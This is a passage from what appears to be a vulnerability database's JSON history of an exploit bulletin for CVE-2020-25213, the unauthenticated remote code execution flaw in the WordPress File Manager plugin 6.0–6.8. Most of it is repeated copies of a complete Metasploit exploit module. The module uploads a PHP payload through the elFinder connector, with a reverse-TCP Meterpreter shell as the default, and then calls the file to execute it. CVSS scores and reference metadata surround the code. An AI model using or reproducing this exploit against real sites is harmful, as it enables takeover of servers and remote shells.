name=\"cmd\"')\r\n\r\n case elfinder_cmd\r\n when 'upload'\r\n post_data.add_part('l1_', nil, nil, 'form-data; name=\"target\"')\r\n post_data.add_part(payload.encoded, 'application/octet-stream', nil, \"form-data; name=\\\"upload[]\\\"; filename=\\\"#{filename}\\\"\")\r\n when 'mkfile'\r\n post_data.add_part('l1_', nil, nil, 'form-data; name=\"target\"')\r\n post_data.add_part(filename, nil, nil, 'form-data; name=\"name\"')\r\n when 'put'\r\n post_data.add_part(\"l1_#{Rex::Text.encode_base64(filename)}\", nil, nil, 'form-data; name=\"target\"')\r\n post_data.add_part(payload.encoded, nil, nil, 'form-data; name=\"content\"')\r\n end\r\n\r\n res = send_request_cgi(\r\n 'uri' => normalize_uri(file_manager_base_uri, 'lib', 'php', 'connector.minimal.php'),\r\n 'method' => 'POST',\r\n 'ctype' => \"multipart/form-data; boundary=#{post_data.bound}\",\r\n 'data' => post_data.to_s\r\n )\r\n\r\n fail_with(Failure::Unreachable, \"#{peer} - Could not connect\") unless res\r\n fail_with(Failure::UnexpectedReply, \"#{peer} - Unexpected HTTP response code: #{res.code}\") unless res.code == 200\r\n end\r\nend\n\n# 0day.today [2021-10-03] #", "category": "", "verified": false}, "lastseen": "2021-10-03T00:12:45", "differentElements": ["sourceData"], "edition": 30}, {"bulletin": {"id": "1337DAY-ID-35215", "vendorId": null, "hash": "d4019e6e18be8212d319bf8a30aa53f5", "type": "zdt", "bulletinFamily": "exploit", "title": "WordPress File Manager 6.8 Remote Code Execution Exploit", "description": "The WordPress File Manager (wp-file-manager) plugin versions 6.0 through 6.8 allows remote attackers to upload and execute arbitrary PHP code because it renames an unsafe example elFinder connector file to have the .php extension. This, for example, allows attackers to run the elFinder upload (or mkfile and put) command to write PHP code into the wp-content/plugins/wp-file-manager/lib/files/ directory.", "published": "2020-11-10T00:00:00", "modified": "2020-11-10T00:00:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/35215", "reporter": "zdt", "references": [], "cvelist": ["CVE-2020-25213"], "immutableFields": [], "lastseen": "2021-10-04T07:10:06", "history": [], "viewCount": 3, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:AA7F75B5-85DC-4246-932B-C13A3A39B197"]}, {"type": "cve", "idList": ["CVE-2020-25213"]}, {"type": "wpexploit", "idList": ["WPEX-ID:E528AE38-72F0-49FF-9878-922EFF59ACE9"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:E528AE38-72F0-49FF-9878-922EFF59ACE9"]}, {"type": "dsquare", "idList": ["E-722"]}, {"type": "nessus", "idList": ["WORDPRESS_PLUGIN_WP_FILE_MANAGER_6_9_RCE.NASL"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:160003"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:7D610378313C0D3F9F5525CC2D5907A7"]}, {"type": "thn", "idList": ["THN:7FD924637D99697D78D53283817508DA"]}], "modified": "2021-09-25T00:19:23", "rev": 2}, "score": {"value": 7.2, "vector": "NONE", "modified": "2021-09-25T00:19:23", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/35215", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n Rank = NormalRanking\r\n\r\n include Msf::Exploit::Remote::HTTP::Wordpress\r\n prepend Msf::Exploit::Remote::AutoCheck\r\n include Msf::Exploit::FileDropper\r\n\r\n def initialize(info = {})\r\n super(\r\n update_info(\r\n info,\r\n 'Name' => 'WordPress File Manager Unauthenticated Remote Code Execution',\r\n 'Description' => %q{\r\n The File Manager (wp-file-manager) plugin from 6.0 to 6.8 for WordPress allows remote attackers to upload and\r\n execute arbitrary PHP code because it renames an unsafe example elFinder connector file to have the .php\r\n extension. This, for example, allows attackers to run the elFinder upload (or mkfile and put) command to write\r\n PHP code into the wp-content/plugins/wp-file-manager/lib/files/ directory.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'Alex Souza (w4fz5uck5)', # initial discovery and PoC\r\n 'Imran E. Dawoodjee <imran [at] threathounds.com>', # msf module\r\n ],\r\n 'References' =>\r\n [\r\n [ 'URL', 'https://github.com/w4fz5uck5/wp-file-manager-0day' ],\r\n [ 'URL', 'https://www.tenable.com/cve/CVE-2020-25213' ],\r\n [ 'CVE', '2020-25213' ]\r\n ],\r\n 'Platform' => [ 'php' ],\r\n 'Privileged' => false,\r\n 'Arch' => ARCH_PHP,\r\n 'Targets' =>\r\n [\r\n [\r\n 'WordPress File Manager 6.0-6.8',\r\n {\r\n 'DefaultOptions' => { 'PAYLOAD' => 'php/meterpreter/reverse_tcp' }\r\n }\r\n ]\r\n ],\r\n 'DisclosureDate' => '2020-09-09', # disclosure date on NVD, PoC was published on August 26 2020\r\n 'DefaultTarget' => 0\r\n )\r\n )\r\n register_options(\r\n [\r\n OptString.new('TARGETURI', [true, 'Base path to WordPress installation', '/']),\r\n OptEnum.new('COMMAND', [true, 'elFinder commands used to exploit the vulnerability', 'upload', %w[upload mkfile+put]])\r\n ]\r\n )\r\n end\r\n\r\n def check\r\n return CheckCode::Unknown unless wordpress_and_online?\r\n\r\n # check the plugin version from readme\r\n check_plugin_version_from_readme('wp-file-manager', '6.9', '6.0')\r\n end\r\n\r\n def exploit\r\n # base path to File Manager plugin\r\n file_manager_base_uri = normalize_uri(target_uri.path, 'wp-content', 'plugins', 'wp-file-manager')\r\n # filename of the file to be uploaded/created\r\n filename = \"#{Rex::Text.rand_text_alphanumeric(6)}.php\"\r\n register_file_for_cleanup(filename)\r\n\r\n case datastore['COMMAND']\r\n when 'upload'\r\n elfinder_post(file_manager_base_uri, 'upload', 'payload' => payload.encoded, 'filename' => filename)\r\n when 'mkfile+put'\r\n elfinder_post(file_manager_base_uri, 'mkfile', 'filename' => filename)\r\n elfinder_post(file_manager_base_uri, 'put', 'payload' => payload.encoded, 'filename' => filename)\r\n end\r\n\r\n payload_uri = normalize_uri(file_manager_base_uri, 'lib', 'files', filename)\r\n print_status(\"#{peer} - Payload is at #{payload_uri}\")\r\n # execute the payload\r\n send_request_cgi('uri' => normalize_uri(payload_uri))\r\n end\r\n\r\n # make it easier to switch between \"upload\" and \"mkfile+put\" exploit methods\r\n def elfinder_post(file_manager_base_uri, elfinder_cmd, opts = {})\r\n filename = opts['filename']\r\n\r\n # prep for exploit\r\n post_data = Rex::MIME::Message.new\r\n post_data.add_part(elfinder_cmd, nil, nil, 'form-data; name=\"cmd\"')\r\n\r\n case elfinder_cmd\r\n when 'upload'\r\n post_data.add_part('l1_', nil, nil, 'form-data; name=\"target\"')\r\n post_data.add_part(payload.encoded, 'application/octet-stream', nil, \"form-data; name=\\\"upload[]\\\"; filename=\\\"#{filename}\\\"\")\r\n when 'mkfile'\r\n post_data.add_part('l1_', nil, nil, 'form-data; name=\"target\"')\r\n post_data.add_part(filename, nil, nil, 'form-data; name=\"name\"')\r\n when 'put'\r\n post_data.add_part(\"l1_#{Rex::Text.encode_base64(filename)}\", nil, nil, 'form-data; name=\"target\"')\r\n post_data.add_part(payload.encoded, nil, nil, 'form-data; name=\"content\"')\r\n end\r\n\r\n res = send_request_cgi(\r\n 'uri' => normalize_uri(file_manager_base_uri, 'lib', 'php', 'connector.minimal.php'),\r\n 'method' => 'POST',\r\n 'ctype' => \"multipart/form-data; boundary=#{post_data.bound}\",\r\n 'data' => post_data.to_s\r\n )\r\n\r\n fail_with(Failure::Unreachable, \"#{peer} - Could not connect\") unless res\r\n fail_with(Failure::UnexpectedReply, \"#{peer} - Unexpected HTTP response code: #{res.code}\") unless res.code == 200\r\n end\r\nend\n\n# 0day.today [2021-10-04] #", "category": "", "verified": false}, "lastseen": "2021-10-04T07:10:06", "differentElements": ["sourceData"], "edition": 31}, {"bulletin": {"id": "1337DAY-ID-35215", "vendorId": null, "hash": "a56ca923942adf611ab6a461c93667cd", "type": "zdt", "bulletinFamily": "exploit", "title": "WordPress File Manager 6.8 Remote Code Execution Exploit", "description": "The WordPress File Manager (wp-file-manager) plugin versions 6.0 through 6.8 allows remote attackers to upload and execute arbitrary PHP code because it renames an unsafe example elFinder connector file to have the .php extension. This, for example, allows attackers to run the elFinder upload (or mkfile and put) command to write PHP code into the wp-content/plugins/wp-file-manager/lib/files/ directory.", "published": "2020-11-10T00:00:00", "modified": "2020-11-10T00:00:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/35215", "reporter": "zdt", "references": [], "cvelist": ["CVE-2020-25213"], "immutableFields": [], "lastseen": "2021-10-05T00:33:08", "history": [], "viewCount": 3, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:AA7F75B5-85DC-4246-932B-C13A3A39B197"]}, {"type": "cve", "idList": ["CVE-2020-25213"]}, {"type": "wpexploit", "idList": ["WPEX-ID:E528AE38-72F0-49FF-9878-922EFF59ACE9"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:E528AE38-72F0-49FF-9878-922EFF59ACE9"]}, {"type": "dsquare", "idList": ["E-722"]}, {"type": "nessus", "idList": ["WORDPRESS_PLUGIN_WP_FILE_MANAGER_6_9_RCE.NASL"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:160003"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:7D610378313C0D3F9F5525CC2D5907A7"]}, {"type": "thn", "idList": ["THN:7FD924637D99697D78D53283817508DA"]}], "modified": "2021-09-25T00:19:23", "rev": 2}, "score": {"value": 7.2, "vector": "NONE", "modified": "2021-09-25T00:19:23", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/35215", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n Rank = NormalRanking\r\n\r\n include Msf::Exploit::Remote::HTTP::Wordpress\r\n prepend Msf::Exploit::Remote::AutoCheck\r\n include Msf::Exploit::FileDropper\r\n\r\n def initialize(info = {})\r\n super(\r\n update_info(\r\n info,\r\n 'Name' => 'WordPress File Manager Unauthenticated Remote Code Execution',\r\n 'Description' => %q{\r\n The File Manager (wp-file-manager) plugin from 6.0 to 6.8 for WordPress allows remote attackers to upload and\r\n execute arbitrary PHP code because it renames an unsafe example elFinder connector file to have the .php\r\n extension. This, for example, allows attackers to run the elFinder upload (or mkfile and put) command to write\r\n PHP code into the wp-content/plugins/wp-file-manager/lib/files/ directory.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'Alex Souza (w4fz5uck5)', # initial discovery and PoC\r\n 'Imran E. Dawoodjee <imran [at] threathounds.com>', # msf module\r\n ],\r\n 'References' =>\r\n [\r\n [ 'URL', 'https://github.com/w4fz5uck5/wp-file-manager-0day' ],\r\n [ 'URL', 'https://www.tenable.com/cve/CVE-2020-25213' ],\r\n [ 'CVE', '2020-25213' ]\r\n ],\r\n 'Platform' => [ 'php' ],\r\n 'Privileged' => false,\r\n 'Arch' => ARCH_PHP,\r\n 'Targets' =>\r\n [\r\n [\r\n 'WordPress File Manager 6.0-6.8',\r\n {\r\n 'DefaultOptions' => { 'PAYLOAD' => 'php/meterpreter/reverse_tcp' }\r\n }\r\n ]\r\n ],\r\n 'DisclosureDate' => '2020-09-09', # disclosure date on NVD, PoC was published on August 26 2020\r\n 'DefaultTarget' => 0\r\n )\r\n )\r\n register_options(\r\n [\r\n OptString.new('TARGETURI', [true, 'Base path to WordPress installation', '/']),\r\n OptEnum.new('COMMAND', [true, 'elFinder commands used to exploit the vulnerability', 'upload', %w[upload mkfile+put]])\r\n ]\r\n )\r\n end\r\n\r\n def check\r\n return CheckCode::Unknown unless wordpress_and_online?\r\n\r\n # check the plugin version from readme\r\n check_plugin_version_from_readme('wp-file-manager', '6.9', '6.0')\r\n end\r\n\r\n def exploit\r\n # base path to File Manager plugin\r\n file_manager_base_uri = normalize_uri(target_uri.path, 'wp-content', 'plugins', 'wp-file-manager')\r\n # filename of the file to be uploaded/created\r\n filename = \"#{Rex::Text.rand_text_alphanumeric(6)}.php\"\r\n register_file_for_cleanup(filename)\r\n\r\n case datastore['COMMAND']\r\n when 'upload'\r\n elfinder_post(file_manager_base_uri, 'upload', 'payload' => payload.encoded, 'filename' => filename)\r\n when 'mkfile+put'\r\n elfinder_post(file_manager_base_uri, 'mkfile', 'filename' => filename)\r\n elfinder_post(file_manager_base_uri, 'put', 'payload' => payload.encoded, 'filename' => filename)\r\n end\r\n\r\n payload_uri = normalize_uri(file_manager_base_uri, 'lib', 'files', filename)\r\n print_status(\"#{peer} - Payload is at #{payload_uri}\")\r\n # execute the payload\r\n send_request_cgi('uri' => normalize_uri(payload_uri))\r\n end\r\n\r\n # make it easier to switch between \"upload\" and \"mkfile+put\" exploit methods\r\n def elfinder_post(file_manager_base_uri, elfinder_cmd, opts = {})\r\n filename = opts['filename']\r\n\r\n # prep for exploit\r\n post_data = Rex::MIME::Message.new\r\n post_data.add_part(elfinder_cmd, nil, nil, 'form-data; name=\"cmd\"')\r\n\r\n case elfinder_cmd\r\n when 'upload'\r\n post_data.add_part('l1_', nil, nil, 'form-data; name=\"target\"')\r\n post_data.add_part(payload.encoded, 'application/octet-stream', nil, \"form-data; name=\\\"upload[]\\\"; filename=\\\"#{filename}\\\"\")\r\n when 'mkfile'\r\n post_data.add_part('l1_', nil, nil, 'form-data; name=\"target\"')\r\n post_data.add_part(filename, nil, nil, 'form-data; name=\"name\"')\r\n when 'put'\r\n post_data.add_part(\"l1_#{Rex::Text.encode_base64(filename)}\", nil, nil, 'form-data; name=\"target\"')\r\n post_data.add_part(payload.encoded, nil, nil, 'form-data; name=\"content\"')\r\n end\r\n\r\n res = send_request_cgi(\r\n 'uri' => normalize_uri(file_manager_base_uri, 'lib', 'php', 'connector.minimal.php'),\r\n 'method' => 'POST',\r\n 'ctype' => \"multipart/form-data; boundary=#{post_data.bound}\",\r\n 'data' => post_data.to_s\r\n )\r\n\r\n fail_with(Failure::Unreachable, \"#{peer} - Could not connect\") unless res\r\n fail_with(Failure::UnexpectedReply, \"#{peer} - Unexpected HTTP response code: #{res.code}\") unless res.code == 200\r\n end\r\nend\n\n# 0day.today [2021-10-05] #", "category": "", "verified": false}, "lastseen": "2021-10-05T00:33:08", "differentElements": ["sourceData"], "edition": 32}, {"bulletin": {"id": "1337DAY-ID-35215", "vendorId": null, "hash": "6513afc6a66d376a6619120bdaf3bae9", "type": "zdt", "bulletinFamily": "exploit", "title": "WordPress File Manager 6.8 Remote Code Execution Exploit", "description": "The WordPress File Manager (wp-file-manager) plugin versions 6.0 through 6.8 allows remote attackers to upload and execute arbitrary PHP code because it renames an unsafe example elFinder connector file to have the .php extension. This, for example, allows attackers to run the elFinder upload (or mkfile and put) command to write PHP code into the wp-content/plugins/wp-file-manager/lib/files/ directory.", "published": "2020-11-10T00:00:00", "modified": "2020-11-10T00:00:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/35215", "reporter": "zdt", "references": [], "cvelist": ["CVE-2020-25213"], "immutableFields": [], "lastseen": "2021-10-05T22:24:04", "history": [], "viewCount": 3, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:AA7F75B5-85DC-4246-932B-C13A3A39B197"]}, {"type": "cve", "idList": ["CVE-2020-25213"]}, {"type": "wpexploit", "idList": ["WPEX-ID:E528AE38-72F0-49FF-9878-922EFF59ACE9"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:E528AE38-72F0-49FF-9878-922EFF59ACE9"]}, {"type": "dsquare", "idList": ["E-722"]}, {"type": "nessus", "idList": ["WORDPRESS_PLUGIN_WP_FILE_MANAGER_6_9_RCE.NASL"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:160003"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:7D610378313C0D3F9F5525CC2D5907A7"]}, {"type": "thn", "idList": ["THN:7FD924637D99697D78D53283817508DA"]}], "modified": "2021-09-25T00:19:23", "rev": 2}, "score": {"value": 7.2, "vector": "NONE", "modified": "2021-09-25T00:19:23", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/35215", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n Rank = NormalRanking\r\n\r\n include Msf::Exploit::Remote::HTTP::Wordpress\r\n prepend Msf::Exploit::Remote::AutoCheck\r\n include Msf::Exploit::FileDropper\r\n\r\n def initialize(info = {})\r\n super(\r\n update_info(\r\n info,\r\n 'Name' => 'WordPress File Manager Unauthenticated Remote Code Execution',\r\n 'Description' => %q{\r\n The File Manager (wp-file-manager) plugin from 6.0 to 6.8 for WordPress allows remote attackers to upload and\r\n execute arbitrary PHP code because it renames an unsafe example elFinder connector file to have the .php\r\n extension. This, for example, allows attackers to run the elFinder upload (or mkfile and put) command to write\r\n PHP code into the wp-content/plugins/wp-file-manager/lib/files/ directory.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'Alex Souza (w4fz5uck5)', # initial discovery and PoC\r\n 'Imran E. Dawoodjee <imran [at] threathounds.com>', # msf module\r\n ],\r\n 'References' =>\r\n [\r\n [ 'URL', 'https://github.com/w4fz5uck5/wp-file-manager-0day' ],\r\n [ 'URL', 'https://www.tenable.com/cve/CVE-2020-25213' ],\r\n [ 'CVE', '2020-25213' ]\r\n ],\r\n 'Platform' => [ 'php' ],\r\n 'Privileged' => false,\r\n 'Arch' => ARCH_PHP,\r\n 'Targets' =>\r\n [\r\n [\r\n 'WordPress File Manager 6.0-6.8',\r\n {\r\n 'DefaultOptions' => { 'PAYLOAD' => 'php/meterpreter/reverse_tcp' }\r\n }\r\n ]\r\n ],\r\n 'DisclosureDate' => '2020-09-09', # disclosure date on NVD, PoC was published on August 26 2020\r\n 'DefaultTarget' => 0\r\n )\r\n )\r\n register_options(\r\n [\r\n OptString.new('TARGETURI', [true, 'Base path to WordPress installation', '/']),\r\n OptEnum.new('COMMAND', [true, 'elFinder commands used to exploit the vulnerability', 'upload', %w[upload mkfile+put]])\r\n ]\r\n )\r\n end\r\n\r\n def check\r\n return CheckCode::Unknown unless wordpress_and_online?\r\n\r\n # check the plugin version from readme\r\n check_plugin_version_from_readme('wp-file-manager', '6.9', '6.0')\r\n end\r\n\r\n def exploit\r\n # base path to File Manager plugin\r\n file_manager_base_uri = normalize_uri(target_uri.path, 'wp-content', 'plugins', 'wp-file-manager')\r\n # filename of the file to be uploaded/created\r\n filename = \"#{Rex::Text.rand_text_alphanumeric(6)}.php\"\r\n register_file_for_cleanup(filename)\r\n\r\n case datastore['COMMAND']\r\n when 'upload'\r\n elfinder_post(file_manager_base_uri, 'upload', 'payload' => payload.encoded, 'filename' => filename)\r\n when 'mkfile+put'\r\n elfinder_post(file_manager_base_uri, 'mkfile', 'filename' => filename)\r\n elfinder_post(file_manager_base_uri, 'put', 'payload' => payload.encoded, 'filename' => filename)\r\n end\r\n\r\n payload_uri = normalize_uri(file_manager_base_uri, 'lib', 'files', filename)\r\n print_status(\"#{peer} - Payload is at #{payload_uri}\")\r\n # execute the payload\r\n send_request_cgi('uri' => normalize_uri(payload_uri))\r\n end\r\n\r\n # make it easier to switch between \"upload\" and \"mkfile+put\" exploit methods\r\n def elfinder_post(file_manager_base_uri, elfinder_cmd, opts = {})\r\n filename = opts['filename']\r\n\r\n # prep for exploit\r\n post_data = Rex::MIME::Message.new\r\n post_data.add_part(elfinder_cmd, nil, nil, 'form-data; name=\"cmd\"')\r\n\r\n case elfinder_cmd\r\n when 'upload'\r\n post_data.add_part('l1_', nil, nil, 'form-data; name=\"target\"')\r\n post_data.add_part(payload.encoded, 'application/octet-stream', nil, \"form-data; name=\\\"upload[]\\\"; filename=\\\"#{filename}\\\"\")\r\n when 'mkfile'\r\n post_data.add_part('l1_', nil, nil, 'form-data; name=\"target\"')\r\n post_data.add_part(filename, nil, nil, 'form-data; name=\"name\"')\r\n when 'put'\r\n post_data.add_part(\"l1_#{Rex::Text.encode_base64(filename)}\", nil, nil, 'form-data; name=\"target\"')\r\n post_data.add_part(payload.encoded, nil, nil, 'form-data; name=\"content\"')\r\n end\r\n\r\n res = send_request_cgi(\r\n 'uri' => normalize_uri(file_manager_base_uri, 'lib', 'php', 'connector.minimal.php'),\r\n 'method' => 'POST',\r\n 'ctype' => \"multipart/form-data; boundary=#{post_data.bound}\",\r\n 'data' => post_data.to_s\r\n )\r\n\r\n fail_with(Failure::Unreachable, \"#{peer} - Could not connect\") unless res\r\n fail_with(Failure::UnexpectedReply, \"#{peer} - Unexpected HTTP response code: #{res.code}\") unless res.code == 200\r\n end\r\nend\n\n# 0day.today [2021-10-06] #", "category": "", "verified": false}, "lastseen": "2021-10-05T22:24:04", "differentElements": ["sourceData"], "edition": 33}, {"bulletin": {"id": "1337DAY-ID-35215", "vendorId": null, "hash": "c0dd9700d7ab8aa797560bab5704d3cd", "type": "zdt", "bulletinFamily": "exploit", "title": "WordPress File Manager 6.8 Remote Code Execution Exploit", "description": "The WordPress File Manager (wp-file-manager) plugin versions 6.0 through 6.8 allows remote attackers to upload and execute arbitrary PHP code because it renames an unsafe example elFinder connector file to have the .php extension. This, for example, allows attackers to run the elFinder upload (or mkfile and put) command to write PHP code into the wp-content/plugins/wp-file-manager/lib/files/ directory.", "published": "2020-11-10T00:00:00", "modified": "2020-11-10T00:00:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/35215", "reporter": "zdt", "references": [], "cvelist": ["CVE-2020-25213"], "immutableFields": [], "lastseen": "2021-10-06T21:18:33", "history": [], "viewCount": 3, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:AA7F75B5-85DC-4246-932B-C13A3A39B197"]}, {"type": "cve", "idList": ["CVE-2020-25213"]}, {"type": "wpexploit", "idList": ["WPEX-ID:E528AE38-72F0-49FF-9878-922EFF59ACE9"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:E528AE38-72F0-49FF-9878-922EFF59ACE9"]}, {"type": "dsquare", "idList": ["E-722"]}, {"type": "nessus", "idList": ["WORDPRESS_PLUGIN_WP_FILE_MANAGER_6_9_RCE.NASL"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:160003"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:7D610378313C0D3F9F5525CC2D5907A7"]}, {"type": "thn", "idList": ["THN:7FD924637D99697D78D53283817508DA"]}], "modified": "2021-09-25T00:19:23", "rev": 2}, "score": {"value": 7.2, "vector": "NONE", "modified": "2021-09-25T00:19:23", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/35215", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n Rank = NormalRanking\r\n\r\n include Msf::Exploit::Remote::HTTP::Wordpress\r\n prepend Msf::Exploit::Remote::AutoCheck\r\n include Msf::Exploit::FileDropper\r\n\r\n def initialize(info = {})\r\n super(\r\n update_info(\r\n info,\r\n 'Name' => 'WordPress File Manager Unauthenticated Remote Code Execution',\r\n 'Description' => %q{\r\n The File Manager (wp-file-manager) plugin from 6.0 to 6.8 for WordPress allows remote attackers to upload and\r\n execute arbitrary PHP code because it renames an unsafe example elFinder connector file to have the .php\r\n extension. This, for example, allows attackers to run the elFinder upload (or mkfile and put) command to write\r\n PHP code into the wp-content/plugins/wp-file-manager/lib/files/ directory.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'Alex Souza (w4fz5uck5)', # initial discovery and PoC\r\n 'Imran E. Dawoodjee <imran [at] threathounds.com>', # msf module\r\n ],\r\n 'References' =>\r\n [\r\n [ 'URL', 'https://github.com/w4fz5uck5/wp-file-manager-0day' ],\r\n [ 'URL', 'https://www.tenable.com/cve/CVE-2020-25213' ],\r\n [ 'CVE', '2020-25213' ]\r\n ],\r\n 'Platform' => [ 'php' ],\r\n 'Privileged' => false,\r\n 'Arch' => ARCH_PHP,\r\n 'Targets' =>\r\n [\r\n [\r\n 'WordPress File Manager 6.0-6.8',\r\n {\r\n 'DefaultOptions' => { 'PAYLOAD' => 'php/meterpreter/reverse_tcp' }\r\n }\r\n ]\r\n ],\r\n 'DisclosureDate' => '2020-09-09', # disclosure date on NVD, PoC was published on August 26 2020\r\n 'DefaultTarget' => 0\r\n )\r\n )\r\n register_options(\r\n [\r\n OptString.new('TARGETURI', [true, 'Base path to WordPress installation', '/']),\r\n OptEnum.new('COMMAND', [true, 'elFinder commands used to exploit the vulnerability', 'upload', %w[upload mkfile+put]])\r\n ]\r\n )\r\n end\r\n\r\n def check\r\n return CheckCode::Unknown unless wordpress_and_online?\r\n\r\n # check the plugin version from readme\r\n check_plugin_version_from_readme('wp-file-manager', '6.9', '6.0')\r\n end\r\n\r\n def exploit\r\n # base path to File Manager plugin\r\n file_manager_base_uri = normalize_uri(target_uri.path, 'wp-content', 'plugins', 'wp-file-manager')\r\n # filename of the file to be uploaded/created\r\n filename = \"#{Rex::Text.rand_text_alphanumeric(6)}.php\"\r\n register_file_for_cleanup(filename)\r\n\r\n case datastore['COMMAND']\r\n when 'upload'\r\n 